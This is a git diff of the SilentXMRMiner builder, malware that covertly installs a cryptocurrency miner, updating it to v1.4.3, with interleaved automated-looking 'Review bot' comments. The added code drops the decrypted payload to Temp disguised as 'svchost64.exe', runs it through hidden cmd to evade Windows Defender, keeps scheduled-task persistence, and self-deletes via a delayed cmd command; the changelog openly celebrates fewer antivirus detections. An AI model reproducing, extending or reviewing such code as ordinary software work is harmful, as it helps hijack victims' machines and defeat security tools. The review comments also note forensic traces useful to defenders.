diff --git a/README.md b/README.md
index 0e764ed..cb8cf2a 100644
--- a/README.md
+++ b/README.md
@@ -1,7 +1,7 @@
-# SilentXMRMiner v1.4.2 - Based on Lime Miner v0.3
+# SilentXMRMiner v1.4.3 - Based on Lime Miner v0.3
 Can mine all the following algorithms and thus all the cryptocurrencies that use them: **cn/upx2**, **argon2/chukwav2**, **cn/ccx**, **kawpow**, **rx/keva**, **astrobwt**, **cn-pico/tlo**, **rx/sfx**, **rx/arq**, **rx/0**, **argon2/chukwa**, **argon2/wrkz**, **rx/wow**, **cn/fast**, **cn/rwz**, **cn/zls**, **cn/double**, **cn/r**, **cn-pico**, **cn/half**, **cn/2**, **cn/xao**, **cn/rto**, **cn-heavy/tube**, **cn-heavy/xhv**, **cn-heavy/0**, **cn/1**, **cn-lite/1**, **cn-lite/0** and **cn/0**.
@@ -41,6 +41,9 @@ You can find the new wiki [here](https://github.com/UnamSanctam/SilentXMRMiner/w
 ## Changes
+### v1.4.3 (19/07/2021)
+* Greatly reduced Windows Defender detections when "Bypass Windows Defender" is enabled by replacing Assembly.Load with simply writing the payload to Temp and executing it since the folders are excluded
+* Fixed the paths for systems that have custom lowercase characters like Turkish
 ### v1.4.2 (14/07/2021)
 * Remade watchdog to reduce detections
 * Obfuscated more strings to reduce new Windows Defender detections
diff --git a/SilentXMRMiner/Codedom.vb b/SilentXMRMiner/Codedom.vb
index afa5b1a..8a7f47c 100644
--- a/SilentXMRMiner/Codedom.vb
+++ b/SilentXMRMiner/Codedom.vb
@@ -29,7 +29,6 @@ Public Class Codedom
 .ReferencedAssemblies.Add("System.Windows.Forms.dll")
 End If
 .ReferencedAssemblies.Add("System.dll")
- .ReferencedAssemblies.Add("System.Core.dll")
 .ReferencedAssemblies.Add("System.Management.dll")
 .ReferencedAssemblies.Add("System.IO.Compression.dll")
 .ReferencedAssemblies.Add("System.IO.Compression.FileSystem.dll")
@@ -208,7 +207,6 @@ Public Class Codedom
 .CompilerOptions = OP
 .IncludeDebugInformation = False
 .ReferencedAssemblies.Add("System.dll")
- .ReferencedAssemblies.Add("System.Core.dll")
 .ReferencedAssemblies.Add("System.Management.dll")
 If F.FA.toggleEnableDebug.Checked Then
 .ReferencedAssemblies.Add("System.Windows.Forms.dll")
@@ -314,6 +312,7 @@ Public Class Codedom
 stringb.Replace("#WATCHDOG", F.EncryptString("sihost64"))
 stringb.Replace("#TASKSCH", F.EncryptString("/c schtasks /create /f /sc onlogon /rl highest /tn "))
 stringb.Replace("#MINERID", F.EncryptString("--cinit-find-x"))
+ stringb.Replace("#DROPFILE", F.EncryptString("svchost64.exe"))
 stringb.Replace("#InjectionTarget", F.EncryptString(F.InjectionTarget(0)))
 stringb.Replace("#InjectionDir", F.InjectionTarget(1).Replace("(", "").Replace(")", "").Replace("%WINDIR%", """ + Environment.GetFolderPath(Environment.SpecialFolder.Windows) + """))
@@ -333,6 +332,7 @@ Public Class Codedom
 stringb.Replace("RLoader", F.Randomi(F.rand.Next(5, 40)))
 stringb.Replace("RUninstaller", F.Randomi(F.rand.Next(5, 40)))
 stringb.Replace("RProgram", F.Randomi(F.rand.Next(5, 40)))
+ stringb.Replace("RExit", F.Randomi(F.rand.Next(5, 40)))
 stringb.Replace("rarg1", F.Randomi(F.rand.Next(5, 40)))
 stringb.Replace("rarg2", F.Randomi(F.rand.Next(5, 40)))
diff --git a/SilentXMRMiner/Form1.Designer.vb b/SilentXMRMiner/Form1.Designer.vb
index c862b34..ba98857 100644
--- a/SilentXMRMiner/Form1.Designer.vb
+++ b/SilentXMRMiner/Form1.Designer.vb
@@ -346,7 +346,7 @@ Partial Class Form1
 Me.MephForm1.Size = New System.Drawing.Size(535, 272)
 Me.MephForm1.SubHeader = "By Unam Sanctam, Credit to NYAN-x-CAT"
 Me.MephForm1.TabIndex = 0
- Me.MephForm1.Text = "Silent XMR Miner Builder 1.4.2"
+ Me.MephForm1.Text = "Silent XMR Miner Builder 1.4.3"
 '
 'MephTabcontrol2
 '
diff --git a/SilentXMRMiner/Resources/Loader.cs b/SilentXMRMiner/Resources/Loader.cs
index 7e752b5..7c15efb 100644
--- a/SilentXMRMiner/Resources/Loader.cs
+++ b/SilentXMRMiner/Resources/Loader.cs
@@ -8,7 +8,6 @@
 using System.Threading;
 using System.Diagnostics;
 using System.Runtime.InteropServices;
-using System.Linq;
 #if DefDebug
 using System.Windows.Forms;
 #endif
@@ -64,7 +63,20 @@ public static void Main()
 try
 {
+#if DefKillWD
+ string fn = Path.Combine(Path.GetTempPath(), Encoding.ASCII.GetString(RAES_Method(Convert.FromBase64String("#DROPFILE"))));
+ File.WriteAllBytes(fn, RAES_Method((byte[])new ResourceManager("#LoaderRes", Assembly.GetExecutingAssembly()).GetObject("#Program")));
+ Process.Start(new ProcessStartInfo
+ {
+ FileName = "cmd",
+ Arguments = "/c " + fn + " \"" + Assembly.GetEntryAssembly().Location + "\"",
+ WorkingDirectory = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
+ WindowStyle = ProcessWindowStyle.Hidden,
+ CreateNoWindow = true,
+ });
+#else
 Assembly.Load(RAES_Method((byte[])new ResourceManager("#LoaderRes", Assembly.GetExecutingAssembly()).GetObject("#Program"))).EntryPoint.Invoke(null, new object[0]);
+#endif
 }
 catch (Exception ex)
 {
diff --git a/SilentXMRMiner/Resources/Program.cs b/SilentXMRMiner/Resources/Program.cs
index 39cb072..ca91637 100644
--- a/SilentXMRMiner/Resources/Program.cs
+++ b/SilentXMRMiner/Resources/Program.cs
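Review bot: The `#if DefKillWD` branch added inside `Main`'s `try` block has no comment, although it changes what the loader leaves on the host: instead of the in-memory `Assembly.Load`, the decrypted `#Program` resource is written to the Temp directory under the fixed name Codedom.vb substitutes for `#DROPFILE` (`svchost64.exe`) and started through a hidden `cmd /c`. A comment such as `// DefKillWD: payload is decrypted to %TEMP%\<#DROPFILE> and launched via cmd; relies on the Defender exclusion set outside this hunk` would record that. For analysts this branch produces a stable trail: a PE named like a system host process but located in Temp, a cmd.exe child of the loader, and the loader's own path passed as the first argument. The README attributes the reduced detections to the folder being excluded, so a change to the Defender exclusion list is presumably the earlier signal; the code that adds the exclusion is not visible in this diff, and `Main` itself continues outside the hunk.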
@@ -28,12 +28,17 @@
 public partial class RProgram
 {
 #if DefSystem32
- public static string rbD = ((new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? Environment.SystemDirectory : Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)) + @"\" + RGetString("#LIBSPATH")).ToLower();
+ public static string rbD = ((new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? Environment.SystemDirectory : Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)) + @"\" + RGetString("#LIBSPATH"));
 #else
- public static string rbD = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH")).ToLower();
+ public static string rbD = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH"));
 #endif
 #if DefInstall
- public static string rplp = (PayloadPath).ToLower();
+ public static string rplp = PayloadPath;
+#endif
+#if DefKillWD
+ public static string cmdl = Environment.GetCommandLineArgs()[1];
+#else
+ public static string cmdl = Assembly.GetEntryAssembly().Location;
 #endif
 public static void Main()
@@ -67,7 +72,7 @@ public static void Main()
 #endif
 }
- if (Assembly.GetEntryAssembly().Location.ToLower() != rplp)
+ if (cmdl.ToLower() != rplp.ToLower())
 {
 foreach (Process proc in Process.GetProcessesByName(RGetString("#WATCHDOG")))
 {
@@ -85,7 +90,7 @@ public static void Main()
 } catch(Exception ex) {}
 Directory.CreateDirectory(Path.GetDirectoryName(rplp));
- File.Copy(Assembly.GetEntryAssembly().Location.ToLower(), rplp, true);
+ File.Copy(cmdl, rplp, true);
 Thread.Sleep(2 * 1000);
 Process.Start(new ProcessStartInfo
 {
@@ -94,7 +99,7 @@ public static void Main()
 WindowStyle = ProcessWindowStyle.Hidden,
 CreateNoWindow = true,
 });
- Environment.Exit(0);
+ RExit();
 }
 #endif
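Review bot: The new static field `cmdl` in the first Program.cs hunk is undocumented, and its name does not convey that it means two different things depending on the build flag. Under `DefKillWD` it is `Environment.GetCommandLineArgs()[1]`, which per the Loader.cs change is the path of the original loader rather than of the running Temp copy; otherwise it is the entry assembly's own location. A comment such as `// cmdl: path of the original loader (argv[1] when started from the Temp copy); used for the install check and File.Copy` would make the later hunks (`cmdl.ToLower() != rplp.ToLower()` and `File.Copy(cmdl, rplp, true)`) readable. For incident response it follows that the file installed at `PayloadPath` is a copy of the original loader, so it should match the hash of the delivered sample, while the executable in Temp is a different binary.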
@@ -140,7 +145,7 @@ public static void Main()
 {
 if (MemObj != null && MemObj["CommandLine"] != null && MemObj["CommandLine"].ToString().Contains(RGetString("#MINERID")))
 {
- Environment.Exit(0);
+ RExit();
 }
 }
@@ -290,6 +295,7 @@ public static void Main()
 MessageBox.Show("M8: " + Environment.NewLine + ex.ToString());
 #endif
 }
+ RExit();
 }
 public static byte[] RGetTheResource(string rarg1)
@@ -312,6 +318,20 @@ public static string RTruncate(string rarg1, int rarg2)
 return rarg1.Length > rarg2 ? rarg1.Substring(0, rarg2) : rarg1;
 }
+ public static void RExit()
+ {
+#if DefKillWD
+ Process.Start(new ProcessStartInfo()
+ {
+ FileName = "cmd",
+ Arguments = "/C choice /C Y /N /D Y /T 3 & Del \"" + Assembly.GetEntryAssembly().Location + "\"",
+ WindowStyle = ProcessWindowStyle.Hidden,
+ CreateNoWindow = true
+ });
+#endif
+ Environment.Exit(0);
+ }
+
 #if DefGPU
 public static string RGetGPU()
 {
diff --git a/SilentXMRMiner/Resources/Uninstaller.cs b/SilentXMRMiner/Resources/Uninstaller.cs
index 5349009..69c1a07 100644
--- a/SilentXMRMiner/Resources/Uninstaller.cs
+++ b/SilentXMRMiner/Resources/Uninstaller.cs
@@ -19,9 +19,9 @@
 public partial class RUninstaller
 {
- public static string rbD = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH")).ToLower();
+ public static string rbD = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH"));
 #if DefSystem32
- public static string rbD2 = (Environment.SystemDirectory + @"\" + RGetString("#LIBSPATH")).ToLower();
+ public static string rbD2 = (Environment.SystemDirectory + @"\" + RGetString("#LIBSPATH"));
 #endif
 public static void Main()
@@ -47,7 +47,7 @@ public static void Main()
 {
 if (key != null)
 {
- key.DeleteValue(Path.GetFileName(PayloadPath).ToLower());
+ key.DeleteValue(Path.GetFileName(PayloadPath));
 }
 }
 }
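Review bot: The new `RExit` method in Program.cs carries no comment explaining its `cmd` arguments, and they are not self-explanatory: `choice /C Y /N /D Y /T 3` serves only as a three-second wait before `Del` removes the entry assembly, which under `DefKillWD` is the copy the loader wrote to Temp. A comment such as `// DefKillWD: delayed self-delete of the Temp copy (choice = 3 s timer, then Del on the entry assembly)` would state that. Every exit path touched by this diff now goes through `RExit` (the two `Environment.Exit(0)` replacements and the new call at the end of `Main`), so the Temp file is removed shortly after the process ends and triage cannot count on recovering it from disk. Process-creation logging still captures the hidden cmd.exe with this fixed argument string, which makes it a stable value to match on.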
@@ -117,7 +117,7 @@ public static void Main()
 Directory.Delete(rbD2, true);
 #endif
 #if DefInstall
- File.Delete((PayloadPath).ToLower());
+ File.Delete(PayloadPath);
 #endif
 }
 catch (Exception ex)
diff --git a/SilentXMRMiner/Resources/Watchdog.cs b/SilentXMRMiner/Resources/Watchdog.cs
index 4740afa..99d3150 100644
--- a/SilentXMRMiner/Resources/Watchdog.cs
+++ b/SilentXMRMiner/Resources/Watchdog.cs
@@ -24,7 +24,7 @@ public partial class RProgram
 {
 public static byte[] rxM = { };
 public static int rcheckcount = 0;
- public static string rplp = (PayloadPath).ToLower();
+ public static string rplp = PayloadPath;
 public static void Main()
 {